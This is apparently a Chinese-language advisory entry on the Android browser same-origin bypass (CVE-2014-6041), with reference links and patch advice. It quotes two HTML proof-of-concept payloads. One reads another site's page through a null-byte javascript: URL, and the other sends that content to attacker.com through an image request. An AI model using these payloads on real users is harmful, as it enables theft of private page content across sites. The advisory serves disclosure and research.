链接:http://xforce.iss.net/xforce/xfdb/95693 http://1337day.com/exploit/22581 *>测试方法:警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Rafay Baloch ()提供了如下测试方法:*Reading the response* You can read the response of any page by accessing the document.body.innerHTML property. <iframe name="test" src="http://www.rhainfosec.com"></iframe> <input type=button value="test" onclick="window.open("u0000javascript:alert(document.body.innerHTML)","test")" > *Stealing the response and sending it to an attackers domain* In real world situation an attacker would send the response to his controlled domain. <iframe name="test" src="http://www.rhainfosec.com"></iframe> <input type=button value="test" onclick="window.open("u0000javascript:var i=new Image();i.src="// attacker.com?"+document.body.innerHTML;document.body.appendChild(i);","test")" >建议: 厂商补丁:Google ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://code.google.com/android/参考:https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041